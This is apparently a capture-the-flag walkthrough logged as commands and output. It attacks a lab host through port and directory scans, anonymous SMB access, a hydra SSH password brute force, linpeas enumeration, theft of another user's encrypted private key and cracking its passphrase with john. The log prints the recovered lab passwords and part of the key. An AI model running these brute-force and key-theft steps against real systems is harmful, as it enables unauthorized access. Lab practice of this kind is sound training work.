nmap -sV -T4 10.49.181.127
# PORT     STATE SERVICE     VERSION
# 22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
# 80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
# 139/tcp  open  netbios-ssn Samba smbd 4.6.2
# 445/tcp  open  netbios-ssn Samba smbd 4.6.2
# 8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
# 8080/tcp open  http        Apache Tomcat 9.0.7

gobuster dir -u http://10.49.181.127/ -w /usr/share/wordlists/dirb/common.txt
# /development          (Status: 301) [Size: 320] [--> http://10.49.181.127/development/]
# /index.html           (Status: 200) [Size: 158]
# /server-status        (Status: 403) [Size: 278]
# Progress: 4614 / 4615 (99.98%)

cat dev.txt
# 2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
# to host that on this server too. Haven't made any real web apps yet, but I have tried that example
# you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
# using version 2.5.12, because other versions were giving me trouble. -K

# 2018-04-22: SMB has been configured. -K

# 2018-04-21: I got Apache set up. Will put in our content later. -J

cat j.txt
# For J:

# I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
# and I was able to crack your hash really easily. You know our password policy, so please follow
# it? Change that password ASAP.

# -K

smbclient -L //10.49.181.127
# Password for [WORKGROUP\root]:

# 	Sharename       Type      Comment
# 	---------       ----      -------
# 	Anonymous       Disk
# 	IPC$            IPC       IPC Service (Samba Server 4.15.13-Ubuntu)
# SMB1 disabled -- no workgroup available

smbclient //10.49.181.127/Anonymous -N
smb: \> ls
# staff.txt
smb: \> get staff.txt
smb: \> exit

cat staff.txt
# Announcement to staff:

# PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
# this is how mistakes happen. (This means you too, Jan!)

# -Kay

hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.49.181.127 ssh
hydra -l jan -P /usr/share/wordlists/rockyou.txt -t 64 10.49.181.127 ssh
# [22][ssh] host: 10.49.181.127   login: jan   password: armando

ssh jan@10.49.181.127
# pass: armando

wget https://github.com/peass-ng/PEASS-ng/releases/download/20260101-f70f6a79/linpeas.sh
scp linpeas.sh jan@10.49.181.127:/tmp

# on target
cd /tmp
chmod +x linpeas.sh
./linpeas.sh
# \u2550\u2550\u2563 Possible private SSH keys were found!
# /home/kay/.ssh/id_rsa

scp jan@10.49.181.127:/home/kay/.ssh/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kay@10.49.181.127
# Enter passphrase for key 'id_rsa':

cat id_rsa
# -----BEGIN RSA PRIVATE KEY-----
# Proc-Type: 4,ENCRYPTED
# DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

# IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
# o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN
# XRvjw/HRiGcXPY8B7nsA1eiPYrPZHIH3QOFIYlSPMYv79RC65i6frkDSvxXzbdfX
# AkAN+3T5FU49AEVKBJtZnLTEBw31mxjv0lLXAqIaX5QfeXMacIQOUWCHATlpVXmN
# lG4BaG7cVXs1AmPieflx7uN4RuB9NZS4Zp0lplbCb4UEawX0Tt+VKd6kzh+Bk0aU

locate ssh2john
/opt/john/ssh2john.py

/opt/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=ssh id_rsa.hash
# beeswax          (id_rsa)

ssh -i id_rsa kay@10.49.181.127
# passphrase: beeswax

cat pass.bak
# heresareallystrongpasswordthatfollowsthepasswordpolicy$$